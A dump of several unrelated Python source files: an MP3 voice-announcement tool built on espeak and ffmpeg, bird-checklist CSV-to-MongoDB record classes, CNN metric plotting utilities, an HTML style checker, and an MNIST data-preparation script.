if os.path.isfile(self.__config.file_out):
out_file_name = self.__config.file_out
else:
if os.path.isdir(self.__config.file_out):
out_file_name = os.path.join(self.__config.file_out, formatted_file_name)
return out_file_name
def __make_temp_dir(self):
self.__tmp_dir = tempfile.mkdtemp()
Log.d('Tmp dir: {}'.format(self.__tmp_dir))
def __cleanup(self):
if not self.__config.no_cleanup:
if self.__tmp_dir is not None and os.path.isdir(self.__tmp_dir):
shutil.rmtree(self.__tmp_dir)
self.__tmp_dir = None
if self.__tmp_mp3_file is not None and os.path.isfile(self.__tmp_mp3_file):
os.remove(self.__tmp_mp3_file)
else:
print('Temp folder "{}" not cleared.'.format(self.__tmp_dir))
def speak_to_wav(self, text, out_file_name):
# noinspection PyProtectedMember
text_tmp_file = os.path.join(self.__tmp_dir, next(tempfile._get_candidate_names()) + '.txt')
with open(text_tmp_file, "wb+") as fh:
fh.write(text)
fh.close()
rc = Util.execute_rc([self.__tools.get_tool(Tools.KEY_ESPEAK),
'-s', str(self.__config.speech_speed),
'-z',
'-w', out_file_name,
'-f', text_tmp_file],
debug=self.__config.debug)
if rc == 0 and not self.__config.no_cleanup:
os.remove(text_tmp_file)
return rc == 0
def __create_voice_wav(self, segments, speech_wav_file_name):
for idx, segment_text in enumerate(segments):
segment_file_name = os.path.join(self.__tmp_dir, '{}.wav'.format(idx))
if not self.speak_to_wav(segment_text, segment_file_name):
raise RuntimeError('Failed to save speak "{0}" into "{1}".'.format(segment_text, segment_file_name))
# we need to get the frequency of speech waveform generated by espeak to later be able to tell
# ffmpeg how to pad/clip the part
import wave
wav = wave.open(os.path.join(self.__tmp_dir, '0.wav'), 'rb')
speech_frame_rate = wav.getframerate()
wav.close()
# merge voice overlay segments into one file with needed padding
concat_cmd = [self.__tools.get_tool(Tools.KEY_FFMPEG), '-y']
filter_complex = ''
filter_complex_concat = ';'
separator = ''
max_len_tick = speech_frame_rate * 60 * self.__config.tick_interval
max_len_title = speech_frame_rate * 60 * self.__config.tick_offset
for idx, _ in enumerate(segments):
concat_cmd.extend(['-i', os.path.join(self.__tmp_dir, '{}.wav'.format(idx))])
# samples = rate_per_second * seconds * tick_interval_in_minutes
max_len = max_len_title if idx == 0 else max_len_tick
# http://ffmpeg.org/ffmpeg-filters.html#Filtergraph-description
filter_complex += '{}[{}]apad=whole_len={}[g{}]'.format(separator, idx, max_len, idx)
separator = ';'
filter_complex_concat += '[g{}]'.format(idx)
filter_complex_concat += 'concat=n={}:v=0:a=1'.format(len(segments))
concat_cmd.extend(['-filter_complex', filter_complex + filter_complex_concat])
concat_cmd.append(speech_wav_file_name)
if Util.execute_rc(concat_cmd) != 0:
raise RuntimeError('Failed to merge voice segments')
def voice_stamp(self, mp3_file_name):
result = True
try:
Log.level_push('Processing "{}"'.format(mp3_file_name))
music_track = Mp3FileInfo(mp3_file_name)
# some sanity checks first
min_track_length = 1 + self.__config.tick_offset
if music_track.duration < min_track_length:
raise ValueError(
'Track too short (min. {}, current len {})'.format(min_track_length, music_track.duration))
# check if we can create output file too
if not self.__config.dry_run_mode:
if os.path.exists(self.get_out_file_name(music_track)) and not self.__config.force_overwrite:
raise OSError('Target "{}" already exists. Use -f to force overwrite.'.format(
self.get_out_file_name(music_track)))
# create temporary folder
self.__make_temp_dir()
# let's now create WAVs with our spoken parts.
ticks = range(self.__config.tick_offset, music_track.duration, self.__config.tick_interval)
extras = {'config_name': self.__config.name}
# First goes track title, then time ticks
# NOTE: we will generate title WAV even if i.e. title_format is empty. This is intentional, to keep
# further logic simpler, because if both title and tick formats would be empty, then skipping
# WAV generation would left us with no speech overlay file for processing and mixing.
# I do not want to have the checks for such case
track_title_to_speak = Util.prepare_for_speak(
Util.process_placeholders(self.__config.title_format,
Util.merge_dicts(music_track.get_placeholders(), extras)))
Log.i('Announced as "{}"'.format(track_title_to_speak))
Log.v('Announcement format "{}"'.format(self.__config.title_format))
segments = [track_title_to_speak]
if self.__config.tick_format != '':
for time_marker in ticks:
minutes = time_marker + self.__config.tick_add
extras = {'minutes': minutes,
'minutes_digits': Util.separate_chars(minutes),
}
tick_string = Util.process_placeholders(self.__config.tick_format,
Util.merge_dicts(music_track.get_placeholders(), extras))
segments.append(Util.prepare_for_speak(tick_string))
if self.__config.dry_run_mode:
Log.i('Duration {} mins, tick count: {}'.format(music_track.duration, (len(segments) - 1)))
Log.v('Tick format "{}"'.format(self.__config.tick_format))
if not self.__config.dry_run_mode:
speech_wav_full = os.path.join(self.__tmp_dir, 'speech.wav')
self.__create_voice_wav(segments, speech_wav_full)
# convert source music track to WAV
music_wav_full_path = os.path.join(self.__tmp_dir, os.path.basename(music_track.file_name) + '.wav')
music_track.to_wav(music_wav_full_path)
# calculate RMS amplitude of music track as reference to gain voice to match
rms_amplitude = self.__audio.calculate_rms_amplitude(music_wav_full_path)
target_speech_rms_amplitude = rms_amplitude * self.__config.speech_volume_factor
self.__audio.adjust_wav_amplitude(music_wav_full_path, target_speech_rms_amplitude)
# mix all stuff together
file_out = self.get_out_file_name(music_track)
if not self.__config.dry_run_mode:
Log.i('Writing: "{}"'.format(file_out))
# noinspection PyProtectedMember
self.__tmp_mp3_file = os.path.join(os.path.dirname(file_out),
next(tempfile._get_candidate_names()) + '.mp3')
# noinspection PyUnboundLocalVariable
self.__audio.mix_wav_tracks(self.__tmp_mp3_file, music_track.get_encoding_quality_for_lame_encoder(),
[music_wav_full_path, speech_wav_full])
# copy some ID tags to newly create MP3 file
music_track.write_id3_tags(self.__tmp_mp3_file)
if os.path.exists(file_out):
os.remove(file_out)
os.rename(self.__tmp_mp3_file, file_out)
self.__tmp_mp3_file = None
else:
output_file_msg = 'Output file "{}"'.format(file_out)
if os.path.exists(self.get_out_file_name(music_track)):
output_file_msg += ' *** TARGET FILE ALREADY EXISTS ***'
Log.i(output_file_msg)
Log.v('Output file name format "{}"'.format(self.__config.file_out_format))
Log.i('')
except RuntimeError as ex:
if not self.__config.debug:
Log.e(ex)
else:
raise
result = False
finally:
Log.level_pop()
self.__cleanup()
return result
|
import logging
from datetime import datetime, timedelta
from cerberus import Validator
from conf import settings
from records.record import InvalidRecord, InvalidRecordLength, InvalidRecordProperty, Record
from tools.csv_helpers import TabDialect, CommaDialect
class MigrationChecklistType(object):
""" class that represents the .csv format of a birt checklist migration type """
@property
def map(self):
return {
'sampling_event_id' : { 'maps_to': 'sampling_event_id'},
'loc_id' : { 'maps_to': 'loc_id'},
'latitude' : { 'maps_to': 'latitude'},
'longitude' : { 'maps_to': 'longitude'},
'year' : { 'maps_to': 'year'},
'month' : { 'maps_to': 'month'},
'day' : { 'maps_to': 'day'},
'time' : { 'maps_to': 'time'},
'country' : { 'maps_to': 'country'},
'state_province' : { 'maps_to': 'state_province'},
'county' : { 'maps_to': 'county'},
'count_type' : { 'maps_to': 'count_type'},
'effort_hrs' : { 'maps_to': 'effort_hrs'},
'effort_distance_km' : { 'maps_to': 'effort_distance_km'},
'effort_area_ha' : { 'maps_to': 'effort_area_ha'},
'observer_id' : { 'maps_to': 'observer_id'},
'number_observers' : { 'maps_to': 'number_observers'},
'group_id' : { 'maps_to': 'group_id'},
'primary_checklist_flag' : { 'maps_to': 'primary_checklist_flag'}}
def __init__(self):
""" MigrationCoreType constructor
Describes the 'contract' for the report, such as the positional
processing rules.
"""
self.collection_name = settings._PATH_COLLECTION_NAME # name of the MongoDB collection
self.record = MigrationChecklistRecord
# positional processing rules
self.title_position = None # zero-based position of the record set title
self.header_position = 0 # zero-based position of the record set header
self.data_position = 1 # zero-based position of the record set
self.num_empty_rows_eod = 0 # data runs until end of file
self.dialect=CommaDialect()
class MigrationChecklistRecord(Record):
""" class that represents the mondoDB migration document """
@property
def schema(self):
""" the cerberus schema definition used for validation of this record """
return {
# _id is samplingEventID
'loc_id' : { 'type': 'string', 'nullable': True, 'required': False},
'loc': { 'type': 'dict', 'schema': {
'type': {'type': 'string'},
'coordinates': {'type': 'list'}}, 'nullable': False},
'year' : { 'type': 'integer', 'nullable': False, 'required': True},
'month' : { 'type': 'integer', 'nullable': False, 'required': True},
'day' : { 'type': 'integer', 'nullable': False, 'required': True},
'time' : { 'type': 'number', 'nullable': True},
'country' : { 'type': 'string', 'nullable': True},
'state_province' : { 'type': 'string', 'nullable': True},
'county' : { 'type': 'string', 'nullable': True},
'count_type' : { 'type': 'string', 'nullable': True},
'effort_hrs' : { 'type': 'number', 'nullable': True},
'effort_distance_km' : { 'type': 'number', 'nullable': True},
'effort_area_ha' : { 'type': 'number', 'nullable': True},
'observer_id' : { 'type': 'string', 'nullable': True},
'number_observers' : { 'type': 'integer', 'nullable': True},
'group_id' : { 'type': 'string', 'nullable': True},
'primary_checklist_flag' : { 'type': 'boolean', 'nullable': True},
'sightings': { 'type': 'list'}}
def __init__(self, header_row, provider_map, collection_name, row_count, mongo_connection):
""" MigrationChecklistRecord constructor
Parameters
----------
header_row : list
The parsed header row
collection_name: str
The name of the mongoDB collection corresponding to this
record
mongo_connection: object
The mongoDB connection
"""
super(MigrationChecklistRecord, self).__init__()
self.header_row = header_row
self.provider_map = provider_map
self.provider_map_keys_lower = map(lambda x: x.lower(), provider_map.keys())
self.collection_name = collection_name
self.row_count = row_count
self.mongo_connection = mongo_connection
self.validator = Validator(self.schema, transparent_schema_rules=True, allow_unknown=True)
@staticmethod
def is_valid_coordinate_pair(coordinates):
""" validates that a pair of coordinates are floats representing
longitudes and latitudes
Parameters
----------
coordinates: list
The coordinate pair as [longitude,latitude]
"""
longitude = coordinates[0]
latitude = coordinates[1]
if longitude == None or latitude == None:
return False
if latitude < -90.0 or latitude > 90.0:
return False
if longitude < -180.0 or longitude > 180.0:
return False
return True
def gen_date(self):
""" generate a datetime object from the fields year, month, and day """
if len(self.fields) == 0:
return
if self.validator.validate(self.fields) == False:
return
date = None
try:
theYear = datetime(self.fields['year'], 1, 1)
date = theYear + timedelta(days=self.fields['day'] - 1)
except ValueError as e:
logging.info('Invalid date: year: %r, day: %r', self.fields['year'], self.fields['day'])
return date
def create(self, row):
""" populate the fields with the row data
The self.fields property will be populated with the column data. An
ordered dictionary is used as insertion order is critical to
maintaining positioning with the header. The order of the headers
within the file is irrelevant but the data must match.
Parameters
----------
row : object
The parsed row containing column data
Raises
------
InvalidRecordProperty
If the record is missing headers or the headers property
is None
InvalidRecordLength
If the record length does not equal the header.
"""
if not 'header_row' in self.__dict__:
raise InvalidRecordProperty('Record is missing "header_row" property')
if self.header_row == None:
raise InvalidRecordProperty('Record "header_row" property is None')
# default coordinates are null
coordinates = [None, None]
self.fields['sightings'] = []
position = 0
for field in row:
unmappedHeader = self.header_row[position]
header = self.map_header(unmappedHeader)
position += 1
# we create unmappeded schema header as nullable integers to
# represent the taxonomy counts
if header == None:
sanitized = Record.sanitize_key(unmappedHeader)
if self.could_be_int(field):
value = int(field)
if value > 0:
self.fields[sanitized] = int(field)
self.fields['sightings'].append({
'bird_id': sanitized,
'count': int(field)
})
continue
# we ignore empty headers
if Record.is_empty_str(header):
continue
# special case for unique id
if header.lower() == 'sampling_event_id':
if not Record.is_empty_str(field):
self.id = field
continue
# special cases to convert to geoJSON
# Always list coordinates in longitude, latitude order.
if header.lower() == 'longitude':
if Record.could_be_float(field):
coordinates[0] = float(field)
continue
if header.lower() == 'latitude':
if Record.could_be_float(field):
coordinates[1] = float(field)
continue
# all other cases set data-type based on schema
self.set_field_by_schema(header, field)
#we cannot have invalid geoJSON objects in mongoDB
if MigrationChecklistRecord.is_valid_coordinate_pair(coordinates):
loc = {
'type': 'Point',
'coordinates': coordinates
}
else:
loc = None
#add the geoJSON 'loc'
self.fields['loc'] = loc
#add the generated date
self.fields['date'] = self.gen_date()
class MigrationCoreType(object):
""" class that represents the .csv format of a birt core migration type """
@property
def map(self):
return {
'sampling_event_id' : { 'maps_to': 'sampling_event_id'},
'loc_id' : { 'maps_to': 'loc_id'},
'pop00_sqmi' : { 'maps_to': 'pop00_sqmi'},
'housing_density' : { 'maps_to': 'housing_density'},
'housing_percent_vacant' : { 'maps_to': 'housing_percent_vacant'},
'elev_gt' : { 'maps_to': 'elev_gt'},
'elev_ned' : { 'maps_to': 'elev_ned'},
'bcr' : { 'maps_to': 'bcr'},
'bailey_ecoregion' : { 'maps_to': 'bailey_ecoregion'},
'omernik_l3_ecoregion' : { 'maps_to': 'omernik_l3_ecoregion'},
'caus_temp_avg' : { 'maps_to': 'caus_temp_avg'},
'caus_temp_min' : { 'maps_to': 'caus_temp_min'},
'caus_temp_max' : { 'maps_to': 'caus_temp_max'},
'caus_prec' : { 'maps_to': 'caus_prec'},
'caus_snow' : { 'maps_to': 'caus_snow'}}
def __init__(self):
""" MigrationCoreType constructor
Describes the 'contract' for the report, such as the positional
processing rules.
"""
self.collection_name = settings._PATH_COLLECTION_NAME # name of the MongoDB collection
self.record = MigrationCoreRecord
# positional processing rules
self.title_position = None # zero-based position of the record set title
self.header_position = 0 # zero-based position of the record set header
self.data_position = 1 # zero-based position of the record set
self.num_empty_rows_eod = 0 # data runs until end of file
self.dialect=CommaDialect()
class MigrationCoreRecord(Record):
""" class that represents the mondoDB migration core document """
@property
def schema(self):
""" the cerberus schema definition used for validation of this record """
return {
# _id is sampling_event_id
'loc_id': { 'type': 'string', 'nullable': True},
'pop00_sqmi': { 'type': 'number', 'nullable': True},
'housing_density': { 'type': 'number', 'nullable': True},
'housing_percent_vacant': { 'type': 'number', 'nullable': True},
'elev_gt': { 'type': 'integer', 'nullable': True},
'elev_ned': { 'type': 'number', 'nullable': True},
'bcr': { 'type': 'integer', 'nullable': True},
'bailey_ecoregion': { 'type': 'string', 'nullable': True},
'omernik_l3_ecoregion': { 'type': 'integer', 'nullable': True},
'caus_temp_avg': { 'type': 'integer', 'nullable': True},
'caus_temp_min': { 'type': 'integer', 'nullable': True},
'caus_temp_max': { 'type': 'integer', 'nullable': True},
'caus_prec': { 'type': 'integer', 'nullable': True},
'caus_snow': { 'type': 'integer', 'nullable': True}}
def __init__(self, header_row, provider_map, collection_name, row_count, mongo_connection):
""" MigrationCoreRecord constructor
Parameters
----------
header_row : list
The parsed header row
collection_name: str
The name of the mongoDB collection corresponding to this
record
mongo_connection: object
The mongoDB connection
"""
super(MigrationCoreRecord, self).__init__()
self.header_row = header_row
self.provider_map = provider_map
self.provider_map_keys_lower = map(lambda x: x.lower(), provider_map.keys())
self.collection_name = collection_name
self.row_count = row_count
self.mongo_connection = mongo_connection
self.validator = Validator(self.schema, transparent_schema_rules=True, allow_unknown=True)
def create(self, row):
""" populate the fields with the row data
The self.fields property will be populated with the column data. An
ordered dictionary is used as insertion order is critical to
maintaining positioning with the header. The order of the headers
within the file is irrelevant but the data must match.
Parameters
----------
row : object
The parsed row containing column data
Raises
------
InvalidRecordProperty
If the record is missing headers or the headers property
is None
InvalidRecordLength
If the record length does not equal the header.
"""
if not 'header_row' in self.__dict__:
raise InvalidRecordProperty('Record is missing "header_row" property')
if self.header_row == None:
raise InvalidRecordProperty('Record "header_row" property is None')
position = 0
for field in row:
unmappedHeader = self.header_row[position]
header = self.map_header(unmappedHeader)
position += 1
# we create unmappeded schema header as nullable numbers to
# represent the NLCD* headers
if header == None:
sanitized = Record.sanitize_key(unmappedHeader)
if self.could_be_number(field):
self.fields[sanitized] = float(field)
else:
self.fields[sanitized] = None
continue
# we ignore empty headers
if Record.is_empty_str(header):
continue
# special case for unique id
if header.lower() == 'sampling_event_id':
if not Record.is_empty_str(field):
self.id = field;
continue
# all other cases set data-type based on schema
self.set_field_by_schema(header, field)
|
<filename>tidalclassifier/cnn/metric_utils.py
import os
import json
import warnings
from collections import namedtuple
import matplotlib
# matplotlib.use('Agg') # Force matplotlib to not use any Xwindows backend.
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
from tidalclassifier.cnn import input_utils
def recordMetrics(acc, loss, val_acc, val_loss, instruct):
warnings.warn('recordMetrics will be deprecated in favour of record_aggregate_metrics or similar!')
name = instruct['name'] + '_' + str(instruct['run_n'])
np.savetxt(name + '_acc_results.txt', acc)
np.savetxt(name + '_loss_results.txt', loss)
np.savetxt(name + '_val_acc_results.txt', val_acc)
np.savetxt(name + '_val_loss_results.txt', val_loss)
def record_aggregate_metrics(acc, loss, val_acc, val_loss, instruct):
"""Take metrics lists (over many runs) and save as JSON.
JSON form is { {run: 0, epoch: [0, 1, 2, ...], loss: [0.5, 1.5, 2.5, ...], ... }, ... }
Used as final stage of training a CNN, flexibly writing metrics to disk for later analysis
Args:
acc (np.array): of form (run, train accuracy after n epochs)
loss (np.array): of form (run, train loss after n epochs)
val_acc (np.array): of form (run, validation accuracy after n epochs)
val_loss (np.array): of form (run, validation loss after n epochs)
instruct (dict): configuration instructions
"""
loc = get_metrics_loc(instruct)
try:
assert len(acc.shape) == 2
except:
raise ValueError('Failure: dimensionality of metrics not understood')
results_list = []
for run in range(len(acc)):
run_data = {
'acc': list(acc[run].astype(float)),
'loss': list(loss[run].astype(float)),
'val_acc': list(val_acc[run].astype(float)),
'val_loss': list(val_loss[run].astype(float)),
'epoch': list(range(len(acc[run]))), # danger, implicit assumption of epochs
'run': int(run)
}
results_list.append(run_data)
with open(loc, 'w') as f:
json.dump(results_list, f)
def get_metrics_loc(instruct):
return os.path.join(instruct['model_dir'], 'metrics.json')
def load_metrics_as_table(instruct):
"""Load previously saved CNN metrics into convenient table for analysis
Args:
instruct (dict): configuration instructions, used for identifying filename to load
Returns:
pd.DataFrame: flat df with metrics by epoch, distinguished by run
"""
with open(get_metrics_loc(instruct), 'r') as f:
metrics = json.load(f)
results_list = []
for experiment in metrics:
results_list.append(pd.DataFrame(data=experiment)) # sets run to same value throughout df
metric_df = pd.concat(results_list, axis=0) # combine run blocks into single df
return metric_df
def plot_aggregate_metrics(metric_df, output_dir):
"""Save figures comparing train/test accuracy and loss by epoch.
Args:
metric_df (pd.DataFrame): metrics, including 'loss', 'epoch', 'run' etc. columns
output_dir (str): directory into which to save figures. Will overwrite!
"""
if not os.path.isdir(output_dir):
os.mkdir(output_dir)
figsize = (8, 4)
plt.clf()
sns.set_style("whitegrid")
# sns.set(font_scale=1.5)
fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=figsize, sharex=True, sharey=True)
sns.lineplot(x='epoch', y='val_acc', data=metric_df, ax=ax1)
ax1.set_xlabel('Epoch')
ax1.set_ylabel('Accuracy')
ax1.set_ylim([0, 1.0])
ax1.set_title('Validation')
sns.lineplot(x='epoch', y='acc', data=metric_df, ax=ax2)
ax2.set_xlabel('Epoch')
ax2.set_ylabel('Accuracy')
ax2.set_ylim([0, 1.0])
ax2.set_title('Training')
fig.tight_layout()
fig.savefig(os.path.join(output_dir, 'acc.png'))
fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=figsize, sharex=True, sharey=True)
sns.lineplot(x='epoch', y='val_loss', data=metric_df, ax=ax1)
ax1.set_xlabel('Epoch')
ax1.set_ylabel('Loss')
ax1.set_ylim([0, 1.0])
ax1.set_title('Validation')
sns.lineplot(x='epoch', y='loss', data=metric_df, ax=ax2)
ax2.set_xlabel('Epoch')
ax2.set_ylabel('Loss')
ax2.set_ylim([0, 1.0])
ax2.set_title('Training')
fig.tight_layout()
fig.savefig(os.path.join(output_dir, 'loss.png'))
plt.clf()
def record_test_predictions(model, val_table, instruct, run=None):
"""Save predictions on all validation subjects to disk, for later analysis.
Args:
model (keras.models.Sequential): trained CNN model
val_table (pd.DataFrame): catalog of test subjects on which to make predictions
instruct (dict): configuration instructions
run (int): Optional. If not None, encode run number in filename.
"""
prediction_table = val_table.copy()
images = np.stack( # stack into batch dimension
[input_utils.construct_image(row, instruct) for _, row in prediction_table.iterrows()]
)
prediction_table['prediction'] = model.predict(images)
if run is None:
filename = 'validation_predictions.csv'
else:
filename = 'validation_predictions_run_{}.csv'.format(run)
prediction_table.to_csv(os.path.join(instruct['model_dir'], filename))
def plot_metrics(acc, loss, val_acc, val_loss, instruct, plt):
warnings.warn('plot_metrics will be deprecated in favour of plot_aggregatre metrics or similar!')
name = instruct['name'] + '_' + str(instruct['run_n'])
# print(val_acc)
# av_acc = np.average(acc, axis=0)
# av_val_acc = np.average(val_acc, axis=0)
# av_loss = np.average(loss, axis=0)
# av_val_loss = np.average(val_loss, axis=0)
# epochs = np.arange(len(acc[0]), dtype='int')
# print(epochs)
#
# plt.figure(1)
#
# plt.subplot(121)
# plt.plot(epochs, av_val_acc, 'k')
# plt = add_conf_interval(plt, epochs, val_acc)
# plt.xlabel('Epoch')
# plt.ylabel('Accuracy')
# plt.ylim([0, 1.0])
# # plt.legend(['Train set', 'Validation set'], loc=0)
# plt.title('Validation')
#
#
# plt.subplot(122)
# plt.plot(epochs, av_acc, 'r')
# plt = add_conf_interval(plt, epochs, acc)
# plt.xlabel('Epoch')
# plt.ylabel('Accuracy')
# plt.ylim([0, 1.0])
# # plt.legend(['Train set', 'Validation set'], loc=0)
# plt.title('Training')
#
# plt.figure(1).subplots_adjust(left=0.1, right=0.9, wspace=0.25)
# plt.savefig(name + '_acc.png')
#
# plt.figure(2)
#
# plt.subplot(121)
# plt.semilogy(epochs, av_val_loss, 'k')
# plt = add_conf_interval(plt, epochs, val_loss)
# plt.xlabel('Epoch')
# plt.ylabel('Loss')
# # plt.ylim([0, 0.7])
# # plt.legend(['Train set', 'Validation set'], loc=0)
# plt.title('Validation')
# # plt.show()
#
#
# plt.subplot(122)
# plt.semilogy(epochs, av_loss, 'r')
# plt = add_conf_interval(plt, epochs, loss)
# plt.xlabel('Epoch')
# plt.ylabel('Loss')
# # plt.ylim([0, 0.7])
# # plt.legend(['Train set', 'Validation set'], loc=0)
# plt.title('Training')
#
# plt.figure(2).subplots_adjust(left=0.1, right=0.9, wspace=0.25)
# plt.savefig(name + '_loss.png')
plt.clf()
sns.set_style("whitegrid")
sns.set(font_scale=1.5)
plt.figure(1)
plt.subplot(121)
sns.tsplot(val_acc)
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim([0, 1.0])
plt.title('Validation')
plt.subplot(122)
sns.tsplot(acc)
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim([0, 1.0])
# plt.legend(['Train set', 'Validation set'], loc=0)
plt.title('Training')
plt.figure(1).subplots_adjust(left=0.1, right=0.9, wspace=0.25)
plt.savefig(name + '_acc.png')
plt.clf()
sns.set_style("whitegrid")
sns.set(font_scale=1.5)
plt.figure(2)
plt.subplot(121)
sns.tsplot(val_loss)
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.ylim([0, 1.0])
plt.title('Validation')
plt.subplot(122)
sns.tsplot(loss)
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.ylim([0, 1.0])
# plt.legend(['Train set', 'Validation set'], loc=0)
plt.title('Training')
plt.figure(1).subplots_adjust(left=0.1, right=0.9, wspace=0.25)
plt.savefig(name + '_loss.png')
# plt.show()
|
# coding=utf-8
from bs4 import BeautifulSoup
import re
def unstandard_count(soup,tag_name,tag,standard_format):
subjects=soup.select(tag_name)
print("length subs info: ",len(subjects))
sum_all = 0
for sub in subjects:
tags=sub.find_all(tag)
style_tag=sub.find_all(tag,{"style":re.compile(standard_format)})
print("subs length:{} and length style_tag:{}".format(len(tags),len(style_tag)))
tag_standards=len(style_tag)
sum_all+= len(tags)-tag_standards
print("在查找到的标签范围内不匹配的值为:",sum_all)
#unstandard_count(html,"table","col",col_style)
#check levels title
def unstandard_title(soup,tag_name,child_tag,levels,standard_format_num,standard_format_char,standard_format_num2=None):
subjects=soup.select('%s[class="%d a DocDefaults "]' %(tag_name,levels))
print("{} level title select nums: {}".format(levels,len(subjects)))
total_items = 0
cur_level_num = 0
cur_level_char = 0
for sub in subjects:
sub_tags = sub.select(child_tag)
total_items += len(sub_tags)
child_tag_nums=sub.find_all(child_tag,{"style":re.compile(standard_format_num)})
if levels > 1:
standard_format_num2 = highLevel_num_format
child_tag_nums2 = sub.find_all(child_tag,{"style":re.compile(standard_format_num2)})
for child_tag_num in child_tag_nums:
if len(re.sub('\w','',child_tag_num.text))<=1:
cur_level_num += 1
for child_tag_num in child_tag_nums2:
if len(re.sub('\w','',child_tag_num.text))<len(child_tag_num.text):
cur_level_num += 1
child_tag_chars = sub.find_all(child_tag,{"style":standard_format_char})
for _ in child_tag_chars:
cur_level_char += 1
#print("match the length:{} and length style_tag:{}".format(len(tags),len(style_tag)))
#tag_standards=len(style_tag)
#sum_all+= len(tags)-tag_standards
non_match_items = total_items - cur_level_char - cur_level_num
print("当前标题级别{}--总的查找条目:{},在查找到的标签范围内不匹配的值为:{}".format(levels,total_items,non_match_items))
#return subjects
"""
#check table font
span_info=[];ss_info=[]
style_info = re.compile('color: #000000;font-size: 11.0pt;;font-family: "SimSun";')
pattern = re.compile(".*color.")
style_info = 'color'
count = 0;count_style=0
td_style = "background-color: #FFC000;border-bottom-style: \
solid;border-bottom-width: 1px;border-bottom-color: \
#000000;border-left-style: solid;border-left-width: \
1px;border-left-color: #000000;border-right-style: \
solid;border-right-width: 1px;border-right-color: \
#000000;border-top-style: solid;border-top-width: \
1px;border-top-color: #000000;vertical-align: bottom;"
col_style = "width: 13.85%;"
tr_style = "height: 0.19in;"
sum_all = 0
#check col style:width,#check tr standard
tables = html.select('table[id^="docx4j"]')
print("length table",len(tables))
for table in tables:
childs = table.colgroup.children
style_col = table.find_all("col",{"style":re.compile("width: 13.85%;")})
print("length style_col:",len(style_col))
col_standards = len(style_col)
#print("childs",childs)
col_nums = 0
for child in childs:
col_nums += 1
print("col_standard={} and col_nums={}".format(col_standard,col_nums))
sum_all += col_nums-col_standards
print("all tables non-standard col numbers: ",sum_all)
#check td font-size
for table in table_info:
table_style = table.select('[id^="docx4j"]')
table_style = table.find({"id":re.compile('^docx4j')})
if table_style:
count += 1
td_style = table_style.find({"style":td_style})
print("td_style",td_style)
col_style = table_style.find(style=col_style)
print("col_style",col_style)
tr_style = table_style.find(attrs={"style":tr_style})
print("tr_style",tr_style)
if td_style and col_style and tr_style:
count_style += 1
spans = table.find_all('span')
spans_standards = table.find_all('span',attrs={"style":re.compile('font-size: 11.0pt;;font-family: ')})
#print(spans[0])
for span in spans:
span_info.append(span.text)
for ss in spans_standards:
ss_info.append(ss.text)
print("count={},count_style={} and span_info length={},span_style length={}".format(count,count_style,len(span_info),len(ss_info)))
non_standards = count-count_style + len(span_info) - len(ss_info)
print("表格式不符合规范的记录数:",non_standards)
"""
if __name__ == "__main__":
#check title
loc_format = "text-align: center;margin-top: 5mm;margin-bottom: 0.43in;"
title_font = "font-weight: bold;font-size: 16.0pt;"
html = BeautifulSoup(open('data/doc2html.html','r',encoding='utf-8'),'lxml')
title_tag = html.find("p")
standard_title_loc = html.find(attrs={"style":loc_format})
count_title = False
if standard_title_loc:
standard_title = standard_title_loc.find("span",{"style":title_font})
if standard_title:
count_title = True
print("the title match the standard")
#levels title check
title_char_format = "font-size: 12.0pt;"
title_num_format = "font-size: 12.0pt;;font-family: 'Calibri';"
highLevel_num_format = "font-size: 12.0pt;;font-family: 'Cambria';white-space:pre-wrap;"
unstandard_title(html,"p","span",2,title_num_format,title_char_format)
|
import _pickle as cPickle
import gzip
import random
import numpy as np
import os,time,subprocess,glob
from stackPH import lifeVect,histVect
from scipy.ndimage.morphology import distance_transform_edt
from skimage.filters import threshold_otsu
from skimage.transform import resize
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import ImageGrid
import argparse
import h5py
# you need cubical ripser
import cripser
def make_rmnist(n=10,size=None,dim=3,save_test=False):
if dim == 2:
with gzip.open("mnist.pkl.gz", 'rb') as f: ## the original MNIST
td, vd, ts = cPickle.load(f, encoding='latin1')
train_x = np.array(td[0]).reshape((-1,28,28))
train_y = np.array(td[1],dtype=np.uint8)
test_x = np.array(ts[0]).reshape((-1,28,28))
test_y = np.array(ts[1],dtype=np.uint8)
elif dim == 3: ## 3D MNIST in Kaggle
with h5py.File("full_dataset_vectors.h5", "r") as hf:
train_x = np.array(hf["X_train"][:]).reshape(-1,16,16,16)
train_y = np.array(hf["y_train"][:])
test_x = np.array(hf["X_test"][:]).reshape(-1,16,16,16)
test_y = np.array(hf["y_test"][:])
if n<len(train_x):
indices = np.random.permutation(len(train_y))
sub_indices = np.concatenate([np.where(train_y==j)[0][:n] for j in range(10)])
np.random.shuffle(sub_indices)
train_x = train_x[sub_indices]
train_y = train_y[sub_indices]
print("Used indices:",sub_indices)
if size != train_x[0].shape[0]:
if dim == 2:
out_shape = (size,size)
else:
out_shape = (size,size,size)
train_x = np.stack([resize(train_x[j],out_shape) for j in range(len(train_x))],axis=0)
if save_test:
test_x = np.stack([resize(test_x[j],out_shape) for j in range(len(test_x))],axis=0)
print("input shape:", train_x.shape,test_x.shape)
return(train_x,train_y,test_x,test_y)
def plot_mnist(dat):
fig = plt.figure(figsize=(10, 2))
grid = ImageGrid(fig, 111,nrows_ncols=(1, len(dat)),axes_pad=0.1)
for i, img in enumerate(dat[:,0]):
bw_img = (img >= threshold_otsu(img))
dat[i,0] = (distance_transform_edt(bw_img)-distance_transform_edt(~bw_img))/5+0.5
if dat.shape[1]>3:
dat[:,1] = np.sum(dat[:,1:((dat.shape[1]+1)//2)],axis=1)/2
dat[:,2] = np.sum(dat[:,((dat.shape[1]+1)//2):],axis=1)/2
for ax, im in zip(grid, dat[:,:3]):
ax.imshow(im.transpose(1,2,0))
print(np.max(dat[:,1],axis=(1,2)),"\n",np.max(dat,axis=(2,3)))
plt.show()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='chainer implementation of pix2pix')
parser.add_argument('--train_sample', '-n', default=1, type=int, help='number of train samples in each class')
parser.add_argument('--size', '-s', default=0, type=int, help='size of image')
parser.add_argument('--dim', '-d', default=2, type=int, choices=[2,3], help='dimension of image')
